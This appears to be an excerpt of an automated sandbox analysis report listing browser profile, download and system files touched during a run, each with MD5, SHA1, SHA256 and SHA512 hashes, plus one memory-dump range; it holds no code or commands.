SHA512 98711c966cb87c168238b06a606ea2881de3d1cd3c40dfd498a6f5e44aca40310f86e0ee4f86a1e37e103ff0e5a97fa759e4e42615a2f106ae9ea4ea2587f141

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3280f915079ab7b66babcb6c05acaae6
SHA1 c93e6c80c788a2cd62ec0b76fda5e153f0489735
SHA256 359d685e1d007b56a3c7dd5cb7a1537b3293793464b2c134667bdb2742acffc1
SHA512 de021a557d69929fecfdc3c02afd6020bc34a7af3bd79fcb1a9823ce56e773ef2a2eb78c09a2448eb0c4d68692f8ac5cf5edf3f09a63bac2730b71460fb54ec9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 9b6df409d8dec31ad1c9f06adddc707a
SHA1 082814c7329f6c74a657fc962619f18c99833ca6
SHA256 36a41c7affe60180809b802fc809360f483e509906d2cb182b60a9ba37a5f36d
SHA512 b356670c80f14c61863140fa8022053212d97981b2ca540ab1259eaf5a464022f2044ac2272189f465c61725e46122cf7100bbfc77c82a0517c3e38b1e72b9a8

C:\Users\Admin\Downloads\Unconfirmed 86727.crdownload

MD5 605a4a8e0fb61ed99f7243582033ca2a
SHA1 286bcdc998c85a7a5c73fe9a3d207d3b93f154da
SHA256 203de717064532e1b79c1b3eb0c0ea35637462b294707c6cb09a45ae4999074e
SHA512 a07c13c99786408b549feb25e09b7e9f4efb86243878e2fca398f498b7a5a55428fd3f106b8b592ee34a6c41fdcd5765cb3e761aa33b092b811e3312348b28d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 485ce0e8f40c104750af3053b3abda56
SHA1 fd54259a71c18265b40e1c81045d9fcfdbc25043
SHA256 1047a1f1a2ad083b4b8369329119c28f9b24e2ca242b9144366a082b4e236976
SHA512 0b066c179ffe2f9b1136e14ba0dc42255a10fe5081bfa7ba1b5c82f797371d91cca1b32e413cce0b50ffc0918c50e21f53c9f15d593f1bc2fd8912b90f93164a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 269ff70128428072eadf4a7ddbc55b74
SHA1 4177f375b449298a52b3eef670cf7571877971f9
SHA256 72f224d7e618362fb5cbd99cdbb17f8438da7259f401ddb58843e261d3537828
SHA512 a13c93e036933beec5fb6dc416ffaea26a0fae82c76ab3b174eecf0b0b25a3c5e562b607bb4281cdb53f17ce2a0dde9aaa705aa32694d8da421c4d6d86a43f2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6e4e5ac683f85d430b5be8fa037cebd2
SHA1 03d3831cbfcee372f975d124262ccd66d966bbc0
SHA256 ace340bb32c1f84c11c9a3939d1bbc2e0dc5430498b6b1a90cd8b91ff94d170c
SHA512 8be27903a4f4f9352b2468220b146bf8d67197e36456d480303ffca624516020fa1d4b645b85c01d4c66ea5047f57931834b1e7c23efad9291147ea7b198dd96

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 4562bc76ad3602447fe0a11b8ab7a6ea
SHA1 0e2e9370b187eabbee56ef1a97452c6d51ecb6a8
SHA256 22d3a06cbb0aa3a168b7eeba9a51ce6a72f1bbeab77b21e2423073c2583bfef7
SHA512 8c21ef7157fce6fcee9fb3c441a8e9cad669b10d45182fddc21a94edd902609f7d62c2e4e148f270242e2ec32408525920a1d671effe26137a6b7368530f5edd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 61ee6d9d5fa28aea7127cfc676cd43e1
SHA1 7f3c59d8a6e8cbc0fac5545da1eb3f5831b43472
SHA256 f2676e73681ffc823de10908723a17b46282f47dad2f744f634764e76d12480c
SHA512 c6f61800bb13b527c2bb4ceba085d4af44a6d304b7da640d39487556cb2aa059469a537815a8fd3c86382b253cae9bce528a80447aa278e5d1cfc7cb8c2b2fab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 39aa0563fdbb0284e43887d5c219bfbb
SHA1 7db94d24a5af2b255395ef450a584fde99dc6037
SHA256 7257f5d263ff1a0d007ace4897b886cfc99799448bd1cb99fb881107b8c44c92
SHA512 65ec34d800bf1874ee7187f741e284f3800269b07e9f42ab485736d64e837e1b2407199a85a29a632dd024c28d4dfd452cb7915f7594778e55d0b10f4ab111af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 db91d3888b93290a4e5a207b5f4bd7ce
SHA1 7b9ebc03dda9902ef4d8e90ee8657a4408eed893
SHA256 8398ce5d691fa10fbfaf777f24d72d8b944a8f22166e929524bb9ca28201b213
SHA512 f6e0c7c649baa7ac69f54d7341bb2c6095c55e461138b29192b847a9a78b7fcd1c47c43dd8ab7dbeac6339eb62aa7b189133cf585742073a192db19210174dae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8a33caa5fa60541cff7ee0b997de23c4
SHA1 b63ca80cd7210dcb6ee423f16c2496fb55137be4
SHA256 9bfaa47764089c1d36329735ba8e08f8996f90a9fea4d803f3dcdfea314a50ff
SHA512 f705b40b84f55aaf90a3d43611c866714aed73a89639609120acd2e4618bf911e14a4ab271fea16b80a8210586ccc64e9675ba61717421e3ba6f62463b7bd781

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0687b5d89dc79ccb00159b338dc33549
SHA1 99a6d12a4f339dc7439aa8140a8a0b0a4b26bae9
SHA256 bd3953c0399560ef333ff9dd36b8dca792ef2b7d1afa59a59f39b0506f4bf2a9
SHA512 78c09e3f9712c941aa359f3e84889afcf7de6ed819d640006f49f9e94e1e2b562edeccb47b34fb4f6fda587e4636dcd1b4f6de3e47620f64c482ada6d0057e7a

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State

MD5 aff1f8d423eea1ceb09dfcc08397676a
SHA1 4d170d6858792a13873be98334dec639a6dfc232
SHA256 418d5803e63d54fb2bf4a3cc6db5628ad912259c032787b2bd3ff19c23b506c7
SHA512 bb5c5962976f8929e13ba97a23b5f68b39f8666d6c69aed153ed07c393825c18065df9df155aa9710a520816b2827735d47162ff8232289ddfa87fcf254ce54d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6e25871e8a4f9c38d217ef7745541d88
SHA1 0dbc525b1ca79bb3c3756fbe18ac158922408cce
SHA256 ca75c8d382ceb736603bbf2be779f03e4fa009240d84566a5a1e211e749f8b1b
SHA512 f50ddcca807916bf1a2452375c23e6ac8e609fb887f66d36f428dbccbed0c1c20aa59576f9e20e58f61ca21d1d2531b074619be175d301303f17bafd93810254

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4b2175b18f44df5c07ff55b671960eca
SHA1 e0a41ba78c8adbd754e56286370924a45be6e41c
SHA256 accf0ba5aeb1c0d9a561e953fb7d0491adf44ef9f7c8ee964fe7f0d080c2f198
SHA512 9b1d825a7e47bf1b37b0908a1c438050d2af1abb8d4e0074cd648f0f2e5d9cd7386c0a8f688029d6c9c18f481c10363de81ee2969a465cdd9149f33b2e646e95

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 92d98b217ed7dd1bb497b8e78417b809
SHA1 32524f744e22fbe7f33b176af9ecf0545a810c31
SHA256 264be3333c22da99de2c2b6c992f29ec85e0eba486cb11723eaa568bb21ec7cc
SHA512 685a370a2ec027ced874147d52024dc338d192e69e04eab9908131ce77e995990999e530303ff8bf81509bed927fc57f243cbde465dbd1ba9e36dcb6916a4356

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity

MD5 775cd0b7e74fcd4d16550f5a8fcff73a
SHA1 4276f6b8c616f200e8c0628829817f7801f46ed0
SHA256 1f2e0108962ddb14c8ffb7bd3c483714a937bb6cbb0cc71de991a1638bd73582
SHA512 5738e1a169d1f1f5669b0eeb8be7c2221ec2e56babef2ebf6b25b896167655eb4a6e0dcdbeb042ebb28c05b6fdc37c4706a08ea4a35e0d97b68118f3370393bf

C:\Windows\System32\perfh009.dat

MD5 f192a9b0239e7d1d68f82eabd1583521
SHA1 fee3eba81cd25dea75d0e6636ad5e29f3a842a71
SHA256 ecb0d867b62ff62be4153970ffc4ed353493f8b5d003c8e2f716a0ac56ca0194
SHA512 ccd860f7d415e070d06e86d32ae1b315c47c4bb5677275e2d75092a796abc75e8bd37db90726a041d96da9fb843524c30d6ad765004baf54900ea4ea3c46d81e

C:\Windows\System32\perfc009.dat

MD5 31b0b43206c3924d306a6342c6b2f0d2
SHA1 a493e0a346c86ea02232f5849a00d1b1b8df14f4
SHA256 8a820f95ee0f8ab0c116286d21087195b0eca2fcd89bc46e55342e99302e72dc
SHA512 d63dd3092dd7a033ac3d3a44b3f736175f8b8b29c12a8e9a6f707d4a2178ba250a55cced5a53e32181c75811324e9c1f2bf03f75998b39da1d9199c3e1dda3ca

memory/1604-4966-0x0000000072E40000-0x0000000072ECA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State

MD5 9c818deafac3be2266e8435aac2e4a55
SHA1 bc60ea5cc16c36967f71b87a1973fca423c1faad
SHA256 2ce91548cd5a9d174c369c376c34e44b8ff8389701b5bc1c00df1b6935ab0154
SHA512 d8415a0b3cd276680c402628bda0e4a66e900847eebaea8158595d9daefc6224eb2ecfaf0ed81038117c88f1217c73e60bf88bb91936d95564dd478bff19d0ca